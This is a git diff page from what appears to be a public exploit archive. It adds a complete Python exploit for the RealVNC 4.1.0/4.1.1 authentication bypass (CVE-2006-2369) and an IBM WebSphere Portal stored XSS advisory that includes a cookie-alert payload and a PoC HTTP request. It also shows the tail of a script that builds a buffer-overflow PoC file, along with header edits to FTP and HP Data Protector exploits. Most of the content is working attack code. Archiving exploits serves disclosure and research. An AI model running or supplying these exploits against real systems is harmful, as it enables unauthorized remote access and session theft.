# 007F63B0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
|
||||
# 007F63C0 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
|
||||
|
||||
file="options.ini"
|
||||
|
||||
junk1="\x41" * 744
|
||||
boom="\x42\x42\x42\x42"
|
||||
junk2="\x43" * 100
|
||||
|
||||
poc="[last]\n"
|
||||
poc=poc + "file=" + junk1 + boom + junk2
|
||||
|
||||
try:
|
||||
print "[*] Creating exploit file...\n"
|
||||
writeFile = open (file, "w")
|
||||
writeFile.write( poc )
|
||||
writeFile.close()
|
||||
print "[*] File successfully created!"
|
||||
except:
|
||||
print "[!] Error while creating file!"
|
|
@ -1,7 +1,7 @@
|
|||
# Exploit Title: Easy FTP Server v1.7.0.11 CWD Command Remote Buffer Overflow Exploit (Post Auth)
|
||||
# Date: 2010-07-18
|
||||
# Author: fdisk (@fdiskyou)
|
||||
# e-mail: fdiskyou at deniable.org
|
||||
# Author: @fdiskyou
|
||||
# e-mail: rui at deniable.org
|
||||
# Software Link:
|
||||
# Version: 1.7.0.11
|
||||
# Tested on: Windows XP SP3 en
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Exploit Title: HP Data Protector Client EXEC_CMD Remote Code Execution Vulnerability PoC (ZDI-11-055)
|
||||
# Date: 2011-05-28
|
||||
# Author: fdisk (@fdiskyou)
|
||||
# e-mail: fdiskyou at deniable.org
|
||||
# Author: @fdiskyou
|
||||
# e-mail: rui at deniable.org
|
||||
# Version: 6.11
|
||||
# Tested on: Windows 2003 Server SP2 en
|
||||
# CVE: CVE-2011-0923
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Exploit Title: HP Data Protector Cliet EXEC_SETUP Remote Code Execution Vulnerability PoC (ZDI-11-056)
|
||||
# Date: 2011-05-29
|
||||
# Author: fdisk (@fdiskyou)
|
||||
# e-mail: fdiskyou at deniable.org
|
||||
# Author: @fdiskyou
|
||||
# e-mail: rui at deniable.org
|
||||
# Version: 6.11
|
||||
# Tested on: Windows 2003 Server SP2 en
|
||||
# CVE: CVE-2011-0922
|
||||
|
|
95
platforms/windows/remote/36932.py
Executable file
95
platforms/windows/remote/36932.py
Executable file
|
@ -0,0 +1,95 @@
|
|||
# Exploit Title: RealVNC 4.1.0 and 4.1.1 Authentication Bypass Exploit
|
||||
# Date: 2012-05-13
|
||||
# Author: @fdiskyou
|
||||
# e-mail: rui at deniable.org
|
||||
# Version: 4.1.0 and 4.1.1
|
||||
# Tested on: Windows XP
|
||||
# CVE: CVE-2006-2369
|
||||
# Requires vncviewer installed
|
||||
# Basic port of hdmoore/msf2 perl version to python for fun and profit (ease of use)
|
||||
import select
|
||||
import thread
|
||||
import os
|
||||
import socket
|
||||
import sys, re
|
||||
|
||||
BIND_ADDR = '127.0.0.1'
|
||||
BIND_PORT = 4444
|
||||
|
||||
def pwn4ge(host, port):
|
||||
socket.setdefaulttimeout(5)
|
||||
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
try:
|
||||
server.connect((host, port))
|
||||
except socket.error, msg:
|
||||
print '[*] Could not connect to the target VNC service. Error code: ' + str(msg[0]) + ' , Error message : ' + msg[1]
|
||||
sys.exit();
|
||||
else:
|
||||
hello = server.recv(12)
|
||||
print "[*] Hello From Server: " + hello
|
||||
if hello != "RFB 003.008\n":
|
||||
print "[*] The remote VNC service is not vulnerable"
|
||||
sys.exit()
|
||||
else:
|
||||
print "[*] The remote VNC service is vulnerable"
|
||||
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
try:
|
||||
listener.bind((BIND_ADDR, BIND_PORT))
|
||||
except socket.error , msg:
|
||||
print '[*] Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
|
||||
sys.exit()
|
||||
print "[*] Listener Socket Bind Complete"
|
||||
listener.listen(10)
|
||||
print "[*] Launching local vncviewer"
|
||||
thread.start_new_thread(os.system,('vncviewer ' + BIND_ADDR + '::' + str(BIND_PORT),))
|
||||
print "[*] Listener waiting for VNC connections on localhost"
|
||||
client, caddr = listener.accept()
|
||||
listener.close()
|
||||
client.send(hello)
|
||||
chello = client.recv(12)
|
||||
server.send(chello)
|
||||
methods = server.recv(2)
|
||||
print "[*] Auth Methods Recieved. Sending Null Authentication Option to Client"
|
||||
client.send("\x01\x01")
|
||||
client.recv(1)
|
||||
server.send("\x01")
|
||||
server.recv(4)
|
||||
client.send("\x00\x00\x00\x00")
|
||||
print "[*] Proxying data between the connections..."
|
||||
running = True
|
||||
while running:
|
||||
selected = select.select([client, server], [], [])[0]
|
||||
if client in selected:
|
||||
buf = client.recv(8192)
|
||||
if len(buf) == 0:
|
||||
running = False
|
||||
server.send(buf)
|
||||
if server in selected and running:
|
||||
buf = server.recv(8192)
|
||||
if len(buf) == 0:
|
||||
running = False
|
||||
client.send(buf)
|
||||
pass
|
||||
client.close()
|
||||
server.close()
|
||||
sys.exit()
|
||||
|
||||
def printUsage():
|
||||
print "[*] Read the source, Luke!"
|
||||
|
||||
def main():
|
||||
try:
|
||||
SERV_ADDR = sys.argv[1]
|
||||
SERV_PORT = sys.argv[2]
|
||||
except:
|
||||
SERV_ADDR = raw_input("[*] Please input an IP address to pwn: ")
|
||||
SERV_PORT = 5900
|
||||
try:
|
||||
socket.inet_aton(SERV_ADDR)
|
||||
except socket.error:
|
||||
printUsage()
|
||||
else:
|
||||
pwn4ge(SERV_ADDR, int(SERV_PORT))
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
70
platforms/xml/webapps/36941.txt
Executable file
70
platforms/xml/webapps/36941.txt
Executable file
|
@ -0,0 +1,70 @@
|
|||
IBM WebSphere Portal Stored Cross-Site Scripting Vulnerability [CVE-2014-0910]
|
||||
|
||||
[+] Author: Filippo Roncari
|
||||
[+] Target: IBM WebSphere Portal
|
||||
[+] Version: 7.0, 6.1.5, 6.1.0
|
||||
[+] Vendor: http://www.ibm.com
|
||||
[+] Accessibility: Remote
|
||||
[+] Severity: Medium
|
||||
[+] CVE: CVE-2014-0910
|
||||
[+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-14-04-IBM.pdf
|
||||
[+] Info: f.roncari@securenetwork.it
|
||||
|
||||
|
||||
[+] Summary
|
||||
IBM WebSphere Portal is a leader in the market product that provides enterprise web portals to help companies deliver a highly-personalized, social experience for their customers. IBM WebSphere Portal gives users a single point of access to the applications, services, information and social connections they need.
|
||||
|
||||
|
||||
[+] Vulnerability Details
|
||||
IBM WebSphere Portal is prone to a stored Cross-Site Scripting (XSS) vulnerability in the Web Content Management component, which allows authenticated users to inject arbitrary JavaScript.
|
||||
A potential attacker authenticated to the Web Content Management can exploit this vulnerability by creating a malicious web content and persuading the victim to visit it. This issue can lead to different kind of user-targeted attacks such as cookie stealing and account violation.
|
||||
|
||||
|
||||
[+] Technical Details
|
||||
View full advisory at https://www.securenetwork.it/docs/advisory/SN-14-04-IBM.pdf for technical details and source code.
|
||||
|
||||
|
||||
[+] Proof of Concept (PoC)
|
||||
Authors are able to insert HTML tags through the HTML view of the Rich Text Editor when creating a new web content, although active scripts are blocked and not executed. However it is possible to inject arbitrary JavaScript using a licit tag such as "img". Rich Text Editor tries to correctly handle the tag allowing client-side script being executed. A trivial payload like the following can be used:
|
||||
|
||||
[!] Sample Payload
|
||||
-------------------------
|
||||
<img src=a onerror=alert(document.cookie)>
|
||||
-------------------------
|
||||
|
||||
An exemplifying HTTP request is reported below.
|
||||
|
||||
[!] PoC HTTP Request
|
||||
-------------------------
|
||||
POST portal/!ut/p/b1/pZHLboMwEEW_KLJJeC5HGHAQkJZQCt5EzqMmx[...] HTTP/1.1 Host:
|
||||
Proxy-Connection: keep-alive
|
||||
Content-Length: 20108
|
||||
Cache-Control: max-age=0
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAzBIVym1up1GRKBv Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch
|
||||
Accept-Language: it-IT,it;q=0.8,en-US;q=0.6,en;q=0.4
|
||||
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
||||
|
||||
------W ebKitFormBoundaryAzBIVym1up1GRKBv
|
||||
Content-Disposition: form-data; name="PC_Z7_CGAH47L00OJ790IAH1AFAN1GT0000000_wh"
|
||||
|
||||
save_and_read_controllable
|
||||
------W ebKitFormBoundaryAzBIVym1up1GRKBv
|
||||
Content-Disposition: form-data; name="PC_Z7_CGAH47L00OJ790IAH1AFAN1GT0000000_wa"
|
||||
|
||||
[...] true
|
||||
------W ebKitFormBoundaryAzBIVym1up1GRKBv
|
||||
Content-Disposition: form-data; name="cmpnt_map_19W14388ed1e14Content_inithtml"
|
||||
|
||||
------W ebKitFormBoundaryAzBIVym1up1GRKBv
|
||||
Content-Disposition: form-data; name="PC_Z7_CGAH47L00OJ790IAH1AFAN1GT0000000_cmpnt_map_19W14388ed1e14Content"
|
||||
|
||||
<img src=a onerror=alert(document.cookie)>
|
||||
------W ebKitFormBoundaryAzBIVym1up1GRKBv
|
||||
Content-Disposition: form-data; name="cmpnt_map_19W14388ed1e14_RTE"
|
||||
-------------------------
|
||||
|
||||
For further details and explanations check the full advisory.
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
|
Loading…
Add table
Reference in a new issue